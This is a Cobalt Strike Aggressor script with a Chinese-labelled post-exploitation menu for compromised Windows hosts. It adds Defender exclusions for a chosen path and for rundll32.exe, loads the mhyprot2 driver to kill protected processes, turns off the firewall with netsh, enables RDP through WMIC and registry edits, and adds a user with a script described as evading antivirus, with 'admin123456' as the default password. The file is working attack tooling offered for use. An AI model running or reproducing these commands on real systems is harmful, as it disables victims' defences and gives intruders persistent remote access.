sub DefenderBypass{
    bshell($bid,"WMIC /Namespace:\\\\root\\Microsoft\\Windows\\Defender class MSFT_MpPreference call Add ExclusionPath=\'$3['path']\'");
    bpowershell($bid, "Add-MpPreference -ExclusionProcess \"$3['path']\\*.exe\"");
    bpowershell($bid, "Add-MpPreference -ExclusionProcess \"rundll32.exe\"");

}
sub MhyProtect{
    bupload($bid,script_resource("bin/mhyprot2.Sys"));
    bexecute_assembly($bid, script_resource("bin/MhyProt2Drv.exe"), "$3['pid']");

}
sub Send {
        $username = replace(beacon_info($bid,"user"),' \*',"");
        $msg = $3['msg'];
        if(($username cmp "SYSTEM") == 0){
            show_error("Cannot send message with SYSTEM !");
            return;
        }
        bshell($bid,"msg $username \"$msg\"");
    }

sub Close_firewall{
   $ver = beacon_info($1['@'],"ver");
   if (double($ver) lt 5.2){
       brun($1, "netsh firewall set opmode disable");
       return;
   }
   brun($1, "netsh advfirewall set allprofiles state off");
}
sub Open_rdp{
   $ver = beacon_info($1['@'],"ver");
   if (double($ver) lt 5.2){
       brun($1, "wmic path win32_terminalservicesetting where (__CLASS !=\"\") call setallowtsconnections 1");
       return;
   }
   brun($1, "wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !=\"\") call setallowtsconnections 1");
   brun($1, "wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName='RDP-Tcp') call setuserauthenticationrequired 1");
   brun($1, "REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f");
}
sub Adduser{
    bpowershell_import($bid, script_resource("bin/adduser.ps1"));
    bpowerpick($bid, "AddUser "."\"$3['username']\" "."\"$3['password']\"");
}

menu "小工具"{
    item "弹框"{
        $bid = $1['@'];
        $dialog = dialog("Chat", %(msg => "Hello: ".beacon_info($bid,"user"),bid => $bid), &Send);
        dialog_description($dialog, "弹窗");
        drow_text_big($dialog,"msg","Message:");
        dbutton_action($dialog, "Send");
        dialog_show($dialog);
        }
    item "关闭防火墙"{
        if (!-isadmin $1['@']){
                show_error("权限不足");
                return;
        }
        Close_firewall($1);
    }
    item "开启RDP"{
        local('$bid');
        $bid = $1;
        if (!-isadmin $bid['@']){
            show_error("权限不足");
                return;
        }
        Open_rdp($1);
    }
    item "API添加用户" {
            $bid = $1;
            $add = dialog("AddUser", %(username => "admin", password => "admin123456", bid => $bid), &Adduser);
            dialog_description($add, "绕过杀软进行添加用户\n条件:拥有Administrator权限");

            drow_text($add, "username", "Username:");
            drow_text($add, "password", "Password:");
            dbutton_action($add, "Run");
            dialog_show($add);
        }
    item "Defender添加排除路径" {
        $bid = $1;
        $dialog = dialog("DefenderBypass", %(path => "c:\\windows\\temp",bid => $bid), &DefenderBypass);
        dialog_description($dialog, "Defender添加排除路径\n最后不要带\\");
        drow_text($dialog,"path","path:");
        dbutton_action($dialog, "Send");
        dialog_show($dialog);
    }
    item "驱动K进程" {
        $bid = $1;
        $dialog = dialog("驱动K进程", %(pid => "",bid => $bid), &MhyProtect);
        dialog_description($dialog, "驱动K进程");
        drow_text($dialog,"pid","pid:");
        dbutton_action($dialog, "Send");
        dialog_show($dialog);
    }

}